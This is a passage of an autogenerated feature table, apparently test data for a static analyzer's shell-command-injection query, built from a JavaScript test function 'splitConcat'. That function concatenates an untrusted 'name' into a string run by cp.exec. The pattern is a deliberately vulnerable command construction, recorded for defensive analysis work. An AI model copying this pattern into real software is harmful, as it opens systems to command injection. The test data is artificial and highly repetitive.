name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:9 | args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:9 | args | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:9 | args | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:9 | args | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:9 | args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args = ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args = ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args = ... + name | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args = ... + name | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:6:483:33 | args = ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:26 | ' my name is ' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:26 | ' my name is ' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:26 | ' my name is ' | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:26 | ' my name is ' | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:26 | ' my name is ' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:26 | ' my name is ' | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:33 | ' my na ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:33 | ' my na ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:33 | ' my na ... + name | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:33 | ' my na ... + name | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:13:483:33 | ' my na ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:30:483:33 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:30:483:33 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:30:483:33 | name | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:30:483:33 | name | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:30:483:33 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:483:30:483:33 | name | stringConcatenatedWith | ' my name is ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:8 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:8 | cmd | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:8 | cmd | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:8 | cmd | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:8 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd = 'echo' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd = 'echo' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd = 'echo' | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd = 'echo' | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:6:484:17 | cmd = 'echo' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:12:484:17 | 'echo' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:12:484:17 | 'echo' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:12:484:17 | 'echo' | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:12:484:17 | 'echo' | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:484:12:484:17 | 'echo' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:3 | cp | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:3 | cp | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:8 | cp.exec | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:8 | cp.exec | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | exceptional return of cp.exec(cmd + args) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | exceptional return of cp.exec(cmd + args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | exceptional return of cp.exec(cmd + args) | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | exceptional return of cp.exec(cmd + args) | enclosingFunctionName | splitConcat | +| 